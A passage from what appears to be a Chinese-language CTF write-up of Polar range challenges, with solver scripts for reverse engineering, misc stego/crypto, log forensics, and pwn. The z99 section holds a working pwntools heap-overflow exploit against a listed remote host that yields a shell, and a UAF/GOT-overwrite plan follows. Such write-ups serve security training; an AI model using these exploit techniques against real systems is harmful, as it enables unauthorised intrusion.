from Crypto.Cipher import DES\nfrom Crypto.Util.Padding import unpad\n\nkey = b'12345678'\nciphertext_hex = '70f8b45991bfe0d8bb35fea26e2712a33185c23178e19265'\n\nciphertext = bytes.fromhex(ciphertext_hex)\ncipher = DES.new(key, DES.MODE_ECB)\n\ndecrypted_padded = cipher.decrypt(ciphertext)\nplaintext = unpad(decrypted_padded, DES.block_size)\n\nprint(plaintext.decode('utf-8'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{xinniankuaile2026}<\/code><\/pre>\n\n\n\n
\u65b0\u6625\u5b88\u62a4\u8005<\/h2>\n\n\n\n
\u5206\u6790MainActivity<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5047\u7684flag<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6838\u5fc3\u903b\u8f91\uff1a\u771f\u6b63\u7684\u6821\u9a8c\u5206\u652f\u8c03\u7528\u4e86 checkSpringBlessing<\/code>\u3002\u8fd9\u662f\u4e00\u4e2a JNI \u65b9\u6cd5\uff0c\u52a0\u8f7d\u4e86 libspringguardian.so<\/code> \u52a8\u6001\u5e93\u3002<\/p>\n\n\n\n
apk\u6539\u6210zip<\/p>\n\n\n\n
IDA \u5206\u6790\uff1a\u4f7f\u7528 IDA Pro \u6253\u5f00 libspringguardian.so<\/code>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a8\u6001\u6ce8\u518c\uff1a \u5728 JNI_OnLoad<\/code> \u51fd\u6570\u4e2d\u53d1\u73b0 JNI \u52a8\u6001\u6ce8\u518c\u903b\u8f91\u3002checkSpringBlessing<\/code> \u65b9\u6cd5\u88ab\u6620\u5c04\u5230\u4e86 C \u5c42\u7684 native_check<\/code><\/strong> \u51fd\u6570\u3002<\/p>\n\n\n\n
native_check<\/code> \u51fd\u6570\u5206\u6790<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53cd\u8c03\u8bd5\uff1a \u5f00\u5934\u4f7f\u7528 ptrace(PTRACE_TRACEME, 0, 0, 0) \u8fdb\u884c\u57fa\u7840\u53cd\u8c03\u8bd5\u68c0\u6d4b\u3002\n\u683c\u5f0f\u63d0\u53d6\uff1a \u626b\u63cf\u8f93\u5165\u5b57\u7b26\u4e32\uff0c\u5b9a\u4f4d flag{ \u548c }\uff0c\u5e76\u8981\u6c42\u5305\u88f9\u7684\u5b57\u7b26\u4e32\u957f\u5ea6\u4e25\u683c\u4e3a 20 \u4f4d\u3002\n\u81ea\u5b9a\u4e49 VM \u6df7\u6dc6\uff1a \u6838\u5fc3\u662f\u4e00\u4e2a\u7b80\u6613\u865a\u62df\u673a\u3002\u4ee3\u7801\u4ee5 0x11AD6 \u4e3a\u57fa\u51c6\u5730\u5740\uff08\u5b9e\u9645\u5b58\u5728 -1 \u5b57\u8282\u7684 Off-by-One \u504f\u79fb\u9677\u9631\uff0c\u771f\u5b9e\u5165\u53e3\u4e3a 0x11AD5\uff09\u8bfb\u53d6\u5b57\u8282\u7801\u6267\u884c\u3002\n\nOpcode \u6620\u5c04\u89c4\u5219\uff1a\n0x10 (16): LOAD -> \u9009\u5b9a\u5f53\u524d\u64cd\u4f5c\u7684\u5b57\u7b26\u7d22\u5f15\u3002\n0x20 (32): XOR -> \u5f02\u6216\u5f53\u524d\u5b57\u7b26\u3002\n0x30 (48): ADD -> \u52a0\u4e0a\u6307\u5b9a\u6570\u503c\u3002\n0x40 (64): CMP -> \u4e0e\u9884\u671f\u503c\u5bf9\u6bd4\u3002\n0xFF (255): HALT -> \u6267\u884c\u5b8c\u6bd5\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\nimport struct\n\ndef get_file_offset(elf_data, rva):\n    if elf_data[:4] != b'x7fELF':\n        return rva\n    if elf_data[4] == 2:\n        e_phoff = struct.unpack_from('<Q', elf_data, 0x20)[0]\n        e_phentsize = struct.unpack_from('<H', elf_data, 0x36)[0]\n        e_phnum = struct.unpack_from('<H', elf_data, 0x38)[0]\n        for i in range(e_phnum):\n            phdr_offset = e_phoff + i * e_phentsize\n            p_type = struct.unpack_from('<I', elf_data, phdr_offset)[0]\n            if p_type == 1:\n                p_offset = struct.unpack_from('<Q', elf_data, phdr_offset + 8)[0]\n                p_vaddr = struct.unpack_from('<Q', elf_data, phdr_offset + 16)[0]\n                p_memsz = struct.unpack_from('<Q', elf_data, phdr_offset + 40)[0]\n                if p_vaddr <= rva < p_vaddr + p_memsz:\n                    return rva - p_vaddr + p_offset\n    return rva\n\ndef solve():\n    filename = \"libspringguardian.so\"\n    with open(filename, 'rb') as f:\n        elf_data = f.read()\n\n    target_rva = 0x11AD6\n    file_offset = get_file_offset(elf_data, target_rva)\n\n    start_scan = max(0, file_offset - 100)\n    end_scan = min(len(elf_data), file_offset + 100)\n\n    best_flag = \"\"\n    max_chars = 0\n\n    for base_idx in range(start_scan, end_scan):\n        flag_chars = ['?'] * 20\n        i = base_idx\n        current_idx = -1\n        ops = []\n        chars_found = 0\n\n        while i < len(elf_data):\n            opcode = elf_data[i]\n            if opcode == 255 or i + 1 >= len(elf_data):\n                break\n\n            operand = elf_data[i+1]\n            i += 2\n\n            if opcode == 16:\n                current_idx = operand\n                ops = []\n            elif opcode == 32:\n                ops.append(('XOR', operand))\n            elif opcode == 48:\n                ops.append(('ADD', operand))\n            elif opcode == 64:\n                target = operand\n                for op, val in reversed(ops):\n                    if op == 'XOR':\n                        target ^= val\n                    elif op == 'ADD':\n                        target = (target - val) % 256\n\n                if 0 <= current_idx < 20:\n                    flag_chars[current_idx] = chr(target)\n                    chars_found += 1\n            else:\n                break\n\n        if chars_found > max_chars:\n            max_chars = chars_found\n            best_flag = \"\".join(flag_chars)\n\n        if chars_found == 20:\n            break\n\n    print(f\"flag{{{best_flag}}}\")\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{`qYNDoYNxodoz`oNgqoN}<\/code><\/pre>\n\n\n\n
ez_login<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Win32 GUI \u6d88\u606f\u673a\u5236\u3001\u5f02\u6216\u89e3\u5bc6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5165\u53e3\u70b9 WinMain<\/code> \u6ce8\u518c\u5e76\u521b\u5efa\u4e86\u767b\u5f55\u7a97\u53e3\u3002\u6838\u5fc3\u903b\u8f91\u5728\u7a97\u53e3\u56de\u8c03\u51fd\u6570 sub_140001070<\/code> \u4e2d\u7684 WM_COMMAND<\/code>\uff08\u6309\u94ae\u70b9\u51fb\u4e8b\u4ef6\uff09\u91cc<\/p>\n\n\n\n
\u6d41\u7a0b<\/p>\n\n\n\n
\u83b7\u53d6\u8f93\u5165\uff1a\n\u7a0b\u5e8f\u8bfb\u53d6\u4e24\u4e2a\u6587\u672c\u6846\u7684\u503c\uff0cID 1001 \u4e3a\u8d26\u53f7\uff08String\uff09\uff0cID 1002 \u4e3a\u5bc6\u7801\uff08String1\uff09\u3002\n\n\u8d26\u53f7\u6821\u9a8c\uff1a\n\u8c03\u7528 lstrcmpA(String, \"admin\")\uff0c\u660e\u6587\u8981\u6c42\u8d26\u53f7\u5fc5\u987b\u662f admin\u3002\n\n\u5bc6\u7801\u89e3\u5bc6\u4e0e\u6821\u9a8c\uff1a\n\u7a0b\u5e8f\u5728\u6808\u4e0a\u786c\u7f16\u7801\u4e86\u4e00\u4e32\u6570\u636e\u8d4b\u503c\u7ed9 String2\uff1a\n276121201, 2084991057, 353440529, 25346\n\u63a5\u7740\u901a\u8fc7\u4e00\u4e2a do-while \u5faa\u73af\uff0c\u5c06\u8fd9 14 \u5b57\u8282\u7684\u6570\u636e\u9010\u5b57\u8282\u4e0e 0x23 \u8fdb\u884c\u5f02\u6216\uff1aString2[v6++] ^= 0x23u;\u3002\n\u5f02\u6216\u540e\u7684\u7ed3\u679c\u4e0e\u6211\u4eec\u8f93\u5165\u7684\u5bc6\u7801\u8fdb\u884c\u6bd4\u5bf9\u3002\n\nflag \u751f\u6210\u903b\u8f91\uff1a\n\u5982\u679c\u8d26\u53f7\u5bc6\u7801\u6b63\u786e\uff0c\u7a0b\u5e8f\u4f1a\u8c03\u7528 sub_140001010\uff08\u5185\u90e8\u5c01\u88c5\u7684 sprintf\uff09\uff0c\u5c06\u8d26\u53f7\u548c\u5bc6\u7801\u62fc\u63a5\u6210 admin:\u5bc6\u7801 \u7684\u683c\u5f0f\u4fdd\u5b58\u5728 pbData \u4e2d\u3002\n\u968f\u540e\u8c03\u7528 Windows CryptoAPI\uff1a\n\nCryptAcquireContextA \u521d\u59cb\u5316\u52a0\u5bc6\u4e0a\u4e0b\u6587\u3002\nCryptCreateHash \u521b\u5efa\u54c8\u5e0c\u5bf9\u8c61\uff0c\u7b97\u6cd5\u6807\u8bc6\u4e3a 0x8003u\uff08\u5373 CALG_MD5\uff09\u3002\nCryptHashData \u8ba1\u7b97 admin:\u5bc6\u7801 \u7684 MD5 \u503c\u3002\n\u6700\u540e\u5c06 MD5 \u8f6c\u4e3a\u5c0f\u5199\u5341\u516d\u8fdb\u5236\uff0c\u5916\u5c42\u62fc\u63a5 flag{%s} \u5f39\u7a97\u8f93\u51fa\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\nimport hashlib\n\nraw_data = struct.pack('<IIIH', 276121201, 2084991057, 353440529, 25346)\npassword = bytes([b ^ 0x23 for b in raw_data]).decode('utf-8')\n\nplain_text = f\"admin:{password}\".encode('utf-8')\nflag_hash = hashlib.md5(plain_text).hexdigest()\n\nprint(f\"flag{{{flag_hash}}}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{717a9b30c9c9ef78bb116152395c4aeb}<\/code><\/pre>\n\n\n\n
\u806a\u660e\u7684\u5927\u5f00\u95e8<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
PE32 (32\u4f4d Windows \u53ef\u6267\u884c\u6587\u4ef6)\uff0c\u7531 Microsoft Visual C\/C++ \u7f16\u8bd1\u3002<\/p>\n\n\n\n
\u7a0b\u5e8f\u6846\u67b6\uff1a\u56fe\u5de6\u4e0a\u89d2\u7684\u56fe\u6807\u662f MFC \u9ed8\u8ba4\u56fe\u6807\uff0c\u8bf4\u660e\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8e MFC \u7f16\u5199\u7684 GUI \u7a0b\u5e8f\u3002<\/p>\n\n\n\n
Resource Hacker \u5de5\u5177\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7ffb\u7ffb\u56fe\u7247\u5c31\u53d1\u73b0flag\u4e86\uff0c\u5e94\u8be5\u662f\u9690\u85cf\u6309\u94ae<\/p>\n\n\n\n
\u7a0b\u5e8f\u60f3\u8981\u7684\u662f\u201c\u7eb8\u5dfe\u201d\u3002<\/p>\n\n\n\n
\u6210\u529f\u8fd4\u56de\u5c31\u662f\u8fd9\u4e2aflag<\/p>\n\n\n\n
flag{youareagoodcat}<\/code><\/pre>\n\n\n\n
Misc<\/h1>\n\n\n\n
PNG\u5934\u7684\u79d8\u5bc6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u975e\u5e38\u7b80\u5355<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u76f4\u63a5\u770b\u5c3e\u90e8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
82 \u540e\u9762\u7684\u4fe1\u606f<\/p>\n\n\n\n
d3e4f1e1d3bafab8c7f3c4b9c6dddcbac4e3e2f3c7cddcbac6ddc0f3c7cddfb0<\/code><\/pre>\n\n\n\n
\u5355\u5b57\u8282\u5f02\u6216\u52a0\u5bc6\uff0c\u5e76\u4e14\u5728\u89e3\u5bc6\u540e\u8fd8\u8fdb\u884c\u4e86\u4e00\u5c42 Base64 \u7f16\u7801\u3002PNG \u7684\u9996\u5b57\u8282\u662f 0x89<\/code>\uff0c\u8fd9\u4e2a\u5c31\u662f\u5bc6\u94a5<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\n\nhex_data = \"d3e4f1e1d3bafab8c7f3c4b9c6dddcbac4e3e2f3c7cddcbac6ddc0f3c7cddfb0\"\ndata = bytes.fromhex(hex_data)\nxor_res = bytes([b ^ 0x89 for b in data])\nprint(base64.b64decode(xor_res).decode('utf-8', errors='ignore'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{573495729345792345}<\/code><\/pre>\n\n\n\n
time<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
key: \u957f\u5ea6\u4e3a 54\n\u7ebf\u7d22: \u5f00\u673a\u65f6\u95f4\u6233 1630416000\nptdh{dqpfsajpsvjgSVgbVQIFLWXZ}<\/code><\/pre>\n\n\n\n
\u5f00\u673a\u65f6\u95f4\u6233\uff081630416000\uff0c\u53732021\u5e749\u67081\u65e5\uff09\u201d\u548c\u201c\u957f\u5ea6 54\u201d\u8fd9\u6837\u542b\u7cca\u7684\u7ebf\u7d22\u8bd5\u56fe\u8bef\u5bfc\u6211\u4eec\uff0c\u53ef\u4ee5\u76f4\u63a5\u5df2\u77e5\u660e\u6587\u653b\u51fb<\/p>\n\n\n\n
\u5934\u90e8\u80af\u5b9a\u662f flag<\/code>\u3002\u5bf9\u6bd4\u5bc6\u6587\u5934\u90e8\u7684 ptdh<\/code>\uff0c\u6211\u4eec\u53ef\u4ee5\u9006\u5411\u51fa Vigenere\uff08\u7ef4\u5409\u5c3c\u4e9a\uff09\u5bc6\u7801\u7684\u6309\u4f4d\u504f\u79fb\u91cf\uff1a<\/p>\n\n\n\n
p - f = 10\nt - l = 8\nd - a = 3\nh - g = 1<\/code><\/pre>\n\n\n\n
\u5faa\u73af\u5bc6\u94a5\u4e3a [10, 8, 3, 1]<\/code>\uff08\u957f\u5ea6\u6b63\u597d\u7b26\u5408\u7ebf\u7d22\u4e2d\u7684 4\uff09\u3002\u5269\u4e0b\u7684\u53ea\u8981\u987a\u63a8\u5373\u53ef\uff0c\u5c31\u53ef\u4ee5\u89e3\u51faflag\uff0c\u7f51\u7ad9\u7206\u7834\u5bc6\u94a5\u4e5f\u884c<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
def decrypt_flag(ciphertext):\n    known_cipher = \"ptdh\"\n    known_plain = \"flag\"\n    key = [(ord(c) - ord(p)) % 26 for c, p in zip(known_cipher, known_plain)]\n\n    res = []\n    key_idx = 0\n\n    for char in ciphertext:\n        if char in \"{}\":\n            res.append(char)\n        else:\n            shift = key[key_idx % len(key)]\n            if char.islower():\n                res.append(chr((ord(char) - 97 - shift) % 26 + 97))\n            elif char.isupper():\n                res.append(chr((ord(char) - 65 - shift) % 26 + 65))\n            else:\n                res.append(char)\n            key_idx += 1\n\n    return \"\".join(res)\n\nciphertext = \"ptdh{dqpfsajpsvjgSVgbVQIFLWXZ}\"\nprint(decrypt_flag(ciphertext))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{timeisgoingfINdaLIFEBOUY}<\/code><\/pre>\n\n\n\n
\u9690\u85cf\u7684\u4e8c\u7ef4\u7801<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u76f4\u63a5LSB \u770b0\u901a\u9053\u5c31\u884c\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{qrc0de_1s_h1dden_1n_p1xels}<\/code><\/pre>\n\n\n\n
\u9ea6\u586b<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
foremost\u53ef\u4ee5\u5f97\u5230\u4e8c\u7ef4\u7801\u626b\u63cf\u662fflag{win<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5c3e\u90e8\u89e3\u5bc6<\/p>\n\n\n\n
import base64\n\nhex_str = \"633256325a5735705a326830626d6c755a516f3d\"\nascii_str = bytes.fromhex(hex_str).decode('utf-8')\nprint(f\"\u7b2c\u4e00\u5c42\u89e3\u7801 (Hex -> ASCII): {ascii_str}\")\nprint(f\"\u7b2c\u4e8c\u5c42\u89e3\u7801 (Base64 -> ASCII): {base64.b64decode(ascii_str).decode('utf-8')}\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u4e2a\u662f\u82f1\u8bed\u76847 8 9 \u7b54\u6848\u5c31\u662f\u8fd9\u4e2a<\/p>\n\n\n\n
AI\u51fa\u6765\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{win789}<\/code><\/pre>\n\n\n\n
\u8001\u9e70\u6349\u5c0f\u9e21<\/h2>\n\n\n\n
gaem\u6d41\u91cf \u5f97\u5230\u524d\u534a\u6bb5flag<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{catch <\/code><\/pre>\n\n\n\n
1.pcap \u6d41\u91cf\u53ef\u4ee5\u5f97\u5230php \u538b\u7f29\u5305\u63d0\u53d6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u540e\u534a\u6bb5you } \u6700\u7ec8<\/p>\n\n\n\n
flag{catch you}<\/code><\/pre>\n\n\n\n
Sis puella magic\uff01<\/h2>\n\n\n\n
\u97f3\u9891\u8f6c\u6469\u65af<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5c0f\u5199<\/p>\n\n\n\n
sispuellamagic<\/p>\n\n\n\n
\u91cc\u9762\u7684\u538b\u7f29\u5305 \u7206\u7834\u5c31\u884c\uff0c\u6211\u731c\u51fa\u9898\u4eba\u9884\u671f\u89e3\u662f\u56fe\u7247\u4e0a\u9762\u6709\u5b57\u6bcd\u5b57\u6bcd\u5c31\u662f\u5bc6\u94a5\uff0c\u97f3\u9891\u7528\u7684\u662fdeepsound\u9690\u5199 \u56fe\u7247\u4e0a\u9762\u7684\u6587\u5b57\u5c31\u662f\u5bc6\u94a5\u51fa\u6765\u5c31\u662f\u538b\u7f29\u5305\u5bc6\u7801\u5176\u5b9e\u538b\u7f29\u5305\u7206\u7834\u5c31\u884c\u56e0\u4e3a\u5c314\u4f4d\uff0c\u63a8\u8350\u7206\u7834<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u65f6\u95f4\u9690\u5199,\u65f6\u95f4\u6233\u4e0e2035-1-11 11:11:11\u7684\u65f6\u95f4\u6233\u4f5c\u4e3a\u5dee\u518d\u8f6c\u6362\u6210ASCII<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\nimport re\nfrom datetime import datetime\n\ndef solve():\n    target_dir = r\"F:\u7b14\u8bb0\u7ec3\u4e60\u9776\u573a\u7b14\u8bb0Polar\u9776\u573aMiscSis puella magic\uff01\u4f55\u4eba\u7684\u8fc7\u5f80\u9898\u76ee\"\n    base_time = datetime(2035, 1, 11, 11, 11, 11)\n    flag = \"\"\n\n    for i in range(1, 25):\n        filepath = os.path.join(target_dir, f\"{i}.txt\")\n        if not os.path.exists(filepath):\n            break\n\n        with open(filepath, 'r', encoding='utf-16') as f:\n            content = f.read()\n\n        match = re.search(r\"\u4fee\u6539\u65f6\u95f4s*:s*(d{4}\/d{1,2}\/d{1,2}s+d{1,2}:d{1,2}:d{1,2})\", content)\n        if match:\n            file_time = datetime.strptime(match.group(1), \"%Y\/%m\/%d %H:%M:%S\")\n            delta = int((file_time - base_time).total_seconds())\n            flag += chr(delta)\n\n    print(flag)\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{Now_you_can_go_home}<\/code><\/pre>\n\n\n\n
attack_log1-attack_log6<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u4e00\uff1a\u5b8c\u6210\u540e\u53f0\u767b\u5f55\u6210\u529f\u7684\u653b\u51fbIP\u5730\u5740\u4e3a\uff1f\uff08\u6ce8\uff1a\u6240\u6709\u7b54\u6848\u4e0d\u9700\u8981md5\u5c0f\u5199\u52a0\u5bc6\uff09<\/p>\n\n\n\n
1 \u770b\u540e\u53f0\u767b\u5f55IP\u5c31\u884c \u67e5\u770bopencart_error.log<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u767b\u5f55\u7684<\/p>\n\n\n\n
flag{45.133.12.77}<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u4e8c\uff1a\u5b8c\u6210\u540e\u53f0\u767b\u5f55\u6210\u529f\u7684\u653b\u51fbIP\u9996\u6b21\u8bbf\u95ee\u540e\u53f0\u767b\u5f55\u5165\u53e3\u7684\u65f6\u95f4\u4e3a\uff1f<\/p>\n\n\n\n
\u4e0a\u4e00\u9898\u786e\u5b9a\u767b\u5f55IP \u76f4\u63a5\u641c\u7d22\u68c0\u7d22\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{2026-02-18 01:28:52}<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u4e09\uff1a\u653b\u51fb\u8005\u63a2\u6d4b\u7684\u654f\u611f\u73af\u5883\u914d\u7f6e\u6587\u4ef6\u8def\u5f84\u4e3a\uff1f<\/p>\n\n\n\n
\u770b\u4e4b\u7c7b\u5c31\u884c\u4e86 .env config.php web.config<\/p>\n\n\n\n
\u627e.env \u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u975e\u5e38\u591a\u5c11\u7684.env\u7684\u8bf7\u6c42\u6240\u4ee5\u786e\u5b9a\u5c31\u662f\u8fd9\u4e2a<\/p>\n\n\n\n
flag{\/.env}<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u56db\uff1a\u540e\u53f0\u767b\u5f55\u6210\u529f\u4f7f\u7528\u7684\u7528\u6237\u540d\u4e3a\uff1f<\/p>\n\n\n\n
\u7b2c\u4e00\u9898\u5c31\u77e5\u9053\u4e86 admin<\/p>\n\n\n\n
flag{admin}<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u4e94\uff1a\u6570\u636e\u5e93\u4e2d\u88ab\u67e5\u8be2\u7684\u8ba2\u5355\u6570\u636e\u8868\u540d\u79f0\u4e3a<\/p>\n\n\n\n
\u770bmysql \u7684\u65e5\u5fd7<\/p>\n\n\n\n
\u8ba2\u5355\u6570\u636e\u8868\uff0c\u5e26\u6709order \u8fd9\u4e2a\u82f1\u8bed\uff0c\u641c\u7d22<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{oc_order}<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u516d\uff1a\u6570\u636e\u5e93\u4e2d\u88ab\u67e5\u8be2\u7684\u5546\u54c1\u6570\u636e\u8868\u540d\u79f0\u4e3a\uff1f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0a\u4e00\u9898\u540e\u9762\u5c31\u662f\u5546\u54c1\u540d<\/p>\n\n\n\n
flag{oc_product}<\/code><\/pre>\n\n\n\n
lib1<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u4e00\uff1a\u6211\u4eecpolar\u9776\u573a\u53d1\u884c\u7684\u53d6\u8bc1\u4e66\u7c4d\u662f\u4ec0\u4e48\uff1f\u5b8c\u6574\u4e66\u540d\u4e0d\u9700\u8981\u5e26\u4e66\u540d\u53f7md5\u5c0f\u5199\u52a0\u5bc6<\/p>\n\n\n\n
\u770b\u6bd4\u8d5b\u56e2\u961f\u4ecb\u7ecd<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{36ff27349d055ddd3501c8208ee162e9}<\/code><\/pre>\n\n\n\n
lib2<\/h2>\n\n\n\n
\u9898\u76ee\u4e8c\uff1a\u9ed1\u5ba2\u7a83\u53d6\u4e86\u4ec0\u4e48\u654f\u611f\u4fe1\u606f\uff08\u5bc6\u7801\u54c8\u5e0c\uff09<\/p>\n\n\n\n
\u706b\u773c\u76f4\u63a5\u51fa\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{$2b$12$AezXgsGg.KkU1vktYupvoehjq2lvfMA.F.SimjYutRHzrjqenYKA.}<\/code><\/pre>\n\n\n\n
Pwn<\/h1>\n\n\n\n
z99<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5806\u6ea2\u51fa\u914d\u5408\u4efb\u610f\u5730\u5740\u5199<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5229\u7528\u601d\u8def\uff1a<\/p>\n\n\n\n
\u7a0b\u5e8f\u8fde\u7eed\u7533\u8bf7\u4e86\u5806\u5757\uff0cv4 \u548c v5 \u662f\u76f8\u90bb\u7684\u3002\ngets(v4[1]) \u6ca1\u6709\u9650\u5236\u8f93\u5165\u957f\u5ea6\uff0c\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\u6211\u4eec\u53ef\u4ee5\u4ece v4[1] \u7684\u6570\u636e\u533a\u4e00\u76f4\u8986\u5199\u5230\u76f8\u90bb\u7684 v5 \u5806\u5757\u3002\n\u628a v5[1] \u5b58\u653e\u7684\u6307\u9488\u8986\u76d6\u4e3a\u5168\u5c40\u53d8\u91cf z99 \u7684\u5730\u5740\u3002\n\u7b2c\u4e8c\u6b21\u8c03\u7528 gets(v5[1]) \u65f6\uff0c\u7a0b\u5e8f\u5b9e\u9645\u5c31\u662f\u5728\u5411 z99 \u5199\u5165\u6570\u636e\uff0c\u6211\u4eec\u76f4\u63a5\u5199\u5165\u6570\u5b57 17 \u5373\u53ef\u6ee1\u8db3\u5224\u65ad\u6761\u4ef6\u62ff shell\u3002\n\u5751\u70b9\uff1a\u5982\u679c\u76f4\u63a5\u62ff\u5783\u573e\u6570\u636e\u586b\u6ee1\u504f\u79fb\uff0c\u4f1a\u7834\u574f v5 \u7684 chunk header\uff08\u5806\u5757\u5934\uff09\u3002\u540e\u7eed\u6ee1\u8db3\u6761\u4ef6\u6267\u884c shell() \u91cc\u7684 system(\"\/bin\/sh\") \u65f6\uff0c\u5e95\u5c42\u4f1a\u8c03\u7528 malloc\/free\uff0c\u68c0\u6d4b\u5230\u5806\u5757\u5934\u88ab\u7834\u574f\u5c31\u4f1a\u76f4\u63a5\u62a5\u9519\u5d29\u6e83\uff08\u629b\u51fa EOF\uff09\u3002\u6240\u4ee5\u5728\u6ea2\u51fa\u8986\u76d6\u65f6\uff0c\u5fc5\u987b\u628a v5 \u7684 prev_size \u4f2a\u9020\u6210 0\uff0csize \u4f2a\u9020\u6210 0x21\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\n\ncontext.arch = 'amd64'\nip = '1.95.7.68'\nport = 2115\n\nelf = ELF('.\/pwn3') \nz99_addr = elf.symbols['z99']\n\nr = remote(ip, port)\n\npayload1  = b'A' * 16           \npayload1 += p64(0)              \npayload1 += p64(0x21)           \npayload1 += b'B' * 8            \npayload1 += p64(z99_addr)       \n\nr.sendline(payload1)\n\npayload2 = p64(17)\nr.sendline(payload2)\n\nr.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{c9f964aa-47e6-47fc-9307-d9c1f584238a}<\/code><\/pre>\n\n\n\n
2free<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
UAF \u6f0f\u6d1e<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
delete<\/code> \u51fd\u6570\uff1a\u5728\u91ca\u653e\u5806\u5757\u65f6\uff0c\u8c03\u7528\u4e86 free<\/code> \uff0c\u4f46\u5e76\u6ca1\u6709\u5c06 chunks<\/code> \u6570\u7ec4\u4e2d\u7684\u6307\u9488\u7f6e\u7a7a\uff08\u60ac\u5782\u6307\u9488\uff09\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
edit \u51fd\u6570\uff1a\u5411\u5806\u5757\u5199\u5165\u6570\u636e\u65f6\uff0c\u6ca1\u6709\u68c0\u67e5\u6307\u9488\u662f\u5426\u5df2\u7ecf\u88ab\u91ca\u653e\uff0c\u5141\u8bb8\u76f4\u63a5\u5bf9\u5df2\u88ab\u91ca\u653e\u7684\u5806\u5757\u8fdb\u884c\u5199\u5165\uff08UAF Write\uff09<\/p>\n\n\n\n
\u5229\u7528 UAF \u52ab\u6301 Fastbin\uff0c\u5c06\u4efb\u610f\u5730\u5740\u5206\u914d\u4e3a\u5806\u5757\uff0c\u6700\u7ec8\u4fee\u6539 GOT \u8868\u83b7\u53d6 Shell\u5c31\u884c<\/p>\n\n\n\n
